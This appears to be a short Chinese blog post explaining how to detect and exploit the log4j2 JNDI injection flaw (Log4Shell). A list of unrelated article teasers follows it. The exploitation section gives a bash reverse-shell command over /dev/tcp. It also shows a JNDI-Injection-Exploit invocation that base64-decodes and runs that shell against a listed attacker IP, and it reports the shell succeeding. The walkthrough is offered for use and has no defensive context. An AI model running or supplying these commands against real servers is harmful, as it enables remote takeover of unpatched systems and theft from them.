您现在的位置是:首页 > 正文

log4j2漏洞检测和利用

2024-02-01 01:08:06阅读 2

1.漏洞检测

漏洞检测使用的是BP插件,插件地址
在这里插入图片描述

2.利用

JNDI注入工具,工具地址 https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0,命令如下:
将以下命令进行base64编码,IP替换为你攻击机IP。

bash -i >& /dev/tcp/x.x.x.x/6553 0>&1

在这里插入图片描述
使用工具命令如下:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c "{echo,base64编码}|{base64,-d}|{bash,-i}" -A 120.77.202.2

在这里插入图片描述
burp发包:
在这里插入图片描述
反弹shell成功:
在这里插入图片描述

网站文章

  • 更改MAC终端显示的主机名

      其实也简单。 之前显示 wuxi:~ tsit$ 执行命令 sudo scutil --set HostName taishan 关闭当前终端,另起一个终端 taishan:~ tsit$

    2024-02-01 01:07:39
  • 百度地图的使用---1、标注(Marker)的使用以及自定义样式 最新发布

    百度地图的使用---1、标注(Marker)的使用以及自定义样式 最新发布

    使用百度地图Marker标记,更改图标样式

    2024-02-01 01:07:22
  • MCU常见通信协议 UART /SPI / I2C 学习记录

    MCU常见通信协议 UART /SPI / I2C 学习记录

    MCU 常见通信协议详解

    2024-02-01 01:07:16
  • mysql查看分片键

    查看表分片:UDAL show config tablerule where tablename in ('表名')

    2024-02-01 01:06:33
  • Redis的5大数据类型

    Redis的5大数据类型

    Redis的5大数据类型

    2024-02-01 01:06:26
  • java -jar .jar -c_如何从jar文件创建C库? - java

    我有一个图书馆的jar文件,其中的内容是一堆.class文件spl├── acm│ ├── graphics│ │ ├── DrawLineElement.class│ │ ├── EndRegionElement.class│ │ ├── FinalPathElement.class│ │ ├── G3DRect.class│ │ ├── GArc.c...

    2024-02-01 01:06:19
  • PLSQL类型相关操作

    1.写一个PLSQL程序,输出”hello world”字符串,语法:dbms_output.put_line('需要输出的字符串');begin --向SQLPLUS客户端工具输出字符串 dbms_output.put_line('hello 你好');end;注意: dbms_output是oracle中的一个输出对象 put_line是上述对象的一个方法,用于输出一个字

    2024-02-01 01:05:52
  • 《中软笔记》仿京东图片浏览

    《中软笔记》仿京东图片浏览

    本片文章的内容为仿京东商品图片浏览时放大的效果如图所示:效果分析:当鼠标移上左边时候该图片就会被放大,并且在右边显示;移动的时候还可以查看该物品的其他部位;鼠标移除就会被隐藏起来,不占物理空间。解决思路:1.写样式不管啥情况先写出来看看再去搞功能右边一个div,放入图片设置图片宽高,左边一个设置为右边div图片的 两倍大;2.写事件分析可知有三种事件(通过触发小盒子的事件,...

    2024-02-01 01:05:43
  • pycharm编写pyspark设置

    pycharm编写pyspark设置

    1、安装好pycharm后,打开pycharm创建项目2、创建项目,指定python位置(可用python虚拟环境)2.1、配置pycharm环境然后:apply==>ok2.2 、添加spark安装包下面的python文件夹中的两个pyspark的zip包3、配置流程4、提交代码到spark上运行...

    2024-02-01 01:05:36
  • Makefile经典教程

    支持原创,请移步陈浩大神博客:http://blog.csdn.net/haoel/article/details/2886这篇文章是对多篇博客的修改和整合,有意见可以私信我,谢谢!Make程序的命令行选项和参数Make命令参数的典型序列如下所示:make [-f makefile文件名][选项][宏定义][目标]这里用[]括起来的表示是可选

    2024-02-01 01:05:28